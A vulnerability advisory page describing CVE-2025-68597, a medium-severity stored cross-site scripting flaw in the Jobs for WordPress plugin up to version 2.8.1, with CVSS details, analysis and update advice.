CVE-2025-68597

MEDIUM
2025-12-24 [email protected]
5.4
CVSS 3.1
Share

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Apr 01, 2026 - 15:22 vuln.today
CVE Published
Dec 24, 2025 - 13:16 nvd
MEDIUM 5.4

Tags

WordPress PHP XSS

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BlueGlass Interactive AG Jobs for WordPress job-postings allows Stored XSS.This issue affects Jobs for WordPress: from n/a through <= 2.8.1.

Analysis

Stored cross-site scripting (XSS) in BlueGlass Interactive AG Jobs for WordPress plugin versions 2.8.1 and earlier allows authenticated users with low privileges to inject malicious scripts into job postings that execute in the browsers of other site visitors. The vulnerability requires user interaction (clicking a crafted link) and affects website visitors with cross-site request forgery capabilities, resulting in limited confidentiality and integrity impact but no availability impact. The issue has a low exploitation probability (EPSS 0.04%) despite publicly disclosed details.

Technical Context

The vulnerability exists in the Jobs for WordPress plugin, a WordPress extension that manages job postings on WordPress-powered websites. The root cause is improper input sanitization and output encoding during the generation of web pages containing job posting content, classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). Attackers with authenticated access (such as job post contributors or administrators with limited roles) can inject unescaped user-controllable data into job postings, which are then rendered to other website visitors without proper encoding. WordPress plugins are server-side components executed within the WordPress content management system framework, and stored XSS vulnerabilities in such plugins can be weaponized to steal session cookies, perform administrative actions, or redirect users to malicious sites.

Affected Products

BlueGlass Interactive AG Jobs for WordPress plugin through version 2.8.1 is affected. The plugin is distributed via the WordPress plugin repository and serves as a job posting management tool for WordPress websites. Identification: plugin slug 'job-postings' on wordpress.org. No specific CPE was provided for this WordPress plugin derivative product.

Remediation

Update the Jobs for WordPress plugin to a version newer than 2.8.1 immediately; check the official WordPress plugin repository or the vendor's website for the latest patched release. If a patched version is not yet available, consider temporarily restricting job posting authorship to trusted administrators only, or disable the plugin until an update is released. For detailed advisory information and patch availability, consult the Patchstack vulnerability database entry at https://patchstack.com/database/Wordpress/Plugin/job-postings/vulnerability/wordpress-jobs-for-wordpress-plugin-2-7-17-cross-site-scripting-xss-vulnerability?_s_id=cve.

Priority Score

27
Low Medium High Critical
KEV: 0
EPSS: +0.0
CVSS: +27
POC: 0

Share

CVE-2025-68597 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy